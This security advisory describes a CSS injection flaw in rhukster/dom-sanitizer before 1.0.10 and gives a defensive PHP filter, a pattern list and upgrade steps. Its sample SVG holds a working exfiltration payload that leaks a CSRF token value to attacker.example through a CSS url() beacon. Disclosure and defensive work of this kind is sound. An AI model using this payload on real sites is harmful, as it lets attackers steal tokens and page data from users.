GHSA-93VF-569F-22CQ: CSS Injection in PHP rhukster/dom-sanitizer via SVG Style Tags
Vulnerability ID: GHSA-93VF-569F-22CQ
CVSS Score: 4.7
Published: 2026-04-10
The PHP package rhukster/dom-sanitizer prior to version 1.0.10 is vulnerable to CSS Injection. The sanitizer permits the inclusion of <style> tags within SVG documents but fails to inspect or neutralize the textual content within these elements. This oversight allows attackers to inject arbitrary CSS, facilitating information disclosure, user tracking, and potential exfiltration of sensitive DOM data via CSS selectors.
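The following is an added example, not code from rhukster/dom-sanitizer or from its fix commit. It shows a defence-in-depth check an application can run over the sanitizer's output: any SVG <style> element whose CSS text contains a construct able to trigger an outbound request (url(), @import, @font-face, legacy expression()/-moz-binding, or CSS escapes that hide those tokens) is removed, which closes the exfiltration channel the advisory describes. The pattern list, the function names and the sample SVG are assumptions made for this example; the library's own validation in 1.0.10 may differ.

```php
<?php
declare(strict_types=1);

// Added example, not part of rhukster/dom-sanitizer. Pattern list is an assumption.
// Each pattern is a CSS construct that can make the browser fetch an attacker URL
// or that is used to disguise such a construct.
const UNSAFE_CSS_PATTERNS = [
    '/\burl\s*\(/i',        // background: url(https://attacker.example/?leak) beacon
    '/@import\b/i',         // @import "https://attacker.example/x.css"
    '/@font-face\b/i',      // src: url(...) inside a font rule
    '/expression\s*\(/i',   // legacy IE expression()
    '/-moz-binding/i',      // legacy XBL bindings
    '/\\\\[0-9a-f]/i',      // CSS escapes such as u\72l that hide the tokens above
];

function cssTextIsSafe(string $css): bool
{
    // Strip comments first so obfuscation like `url/**/(` is normalised away.
    $stripped = preg_replace('~/\*.*?\*/~s', '', $css) ?? $css;
    foreach (UNSAFE_CSS_PATTERNS as $pattern) {
        if (preg_match($pattern, $stripped) === 1) {
            return false;
        }
    }
    return true;
}

/**
 * Remove every <style> element (in any namespace) whose CSS text is unsafe.
 * Returns [rewritten SVG, number of elements removed].
 */
function stripUnsafeSvgStyles(string $svg): array
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true);
    // LIBXML_NONET: never fetch external DTDs or entities while parsing untrusted input.
    $loaded = $doc->loadXML($svg, LIBXML_NONET);
    libxml_use_internal_errors($previous);
    if ($loaded === false) {
        throw new InvalidArgumentException('input is not well-formed XML/SVG');
    }

    // Copy the live NodeList first: removing nodes while iterating it skips siblings.
    $styles = [];
    foreach ($doc->getElementsByTagNameNS('*', 'style') as $style) {
        $styles[] = $style;
    }
    $removed = 0;
    foreach ($styles as $style) {
        if (!cssTextIsSafe($style->textContent)) {
            $style->parentNode->removeChild($style);
            $removed++;
        }
    }
    return [$doc->saveXML(), $removed];
}

// Constructed sample input: one benign rule and one exfiltration payload of the kind
// the advisory describes (an attribute selector that beacons to an attacker host
// when the SVG is inlined into a page containing a matching element).
$sample = <<<'SVG'
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <style>.ok { fill: red; }</style>
  <style>input[name="csrf"][value^="a"] { background: url(https://attacker.example/leak?c=a); }</style>
  <rect class="ok" width="10" height="10"/>
</svg>
SVG;

[$clean, $removed] = stripUnsafeSvgStyles($sample);
printf("removed %d unsafe <style> element(s)\n", $removed);
echo $clean;
```

Rejecting a whole <style> element rather than editing its CSS is deliberate: CSS tokenization has enough escape and comment forms that a reject-on-match rule is easier to get right than an in-place rewrite. This check complements the upgrade to 1.0.10, it does not replace it.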
TL;DR
A CSS injection vulnerability exists in rhukster/dom-sanitizer < 1.0.10 due to missing validation on SVG <style> tag content, allowing data exfiltration via external resource requests.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-79
- Attack Vector: Network
- CVSS Score: 4.7 (Medium)
- Impact: Information Disclosure / CSS Injection
- Exploit Status: PoC Available
- KEV Status: Not Listed
Affected Systems
- rhukster/dom-sanitizer (PHP/Composer ecosystem)
- Applications utilizing rhukster/dom-sanitizer for SVG processing (e.g., Statamic CMS)
- rhukster/dom-sanitizer: < 1.0.10 (fixed in 1.0.10)
Code Analysis
Commit: 49a9804
Fix CSS injection vulnerability by validating content
Exploit Details
- GitHub Advisory Database (https://github.com/rhukster/dom-sanitizer/security/advisories/GHSA-93vf-569f-22cq): proof of concept demonstrating CSS injection via an external URL request.
Mitigation Strategies
- Update rhukster/dom-sanitizer to version 1.0.10 or later.
- Disable the <style> tag in the SVG allowlist configuration if CSS styling is not strictly required.
Remediation Steps:
1. Run composer update rhukster/dom-sanitizer to pull the patched version.
2. Verify that the deployed version is >= 1.0.10 by inspecting composer.lock (or with composer show rhukster/dom-sanitizer).
3. Review how the application renders sanitized SVG. An SVG inlined into the page DOM shares that document, so injected CSS can select and style host-page elements; an SVG served through an <img> element cannot reach the host document and does not load external resources.
References
- GitHub Advisory: GHSA-93VF-569F-22CQ, https://github.com/rhukster/dom-sanitizer/security/advisories/GHSA-93vf-569f-22cq
- Fix commit 49a98046, https://github.com/rhukster/dom-sanitizer/commit/49a98046b708a4c92f754f5b0ef1720bb85142e2
- rhukster/dom-sanitizer repository, https://github.com/rhukster/dom-sanitizer
Full report: https://cvereports.com/reports/GHSA-93VF-569F-22CQ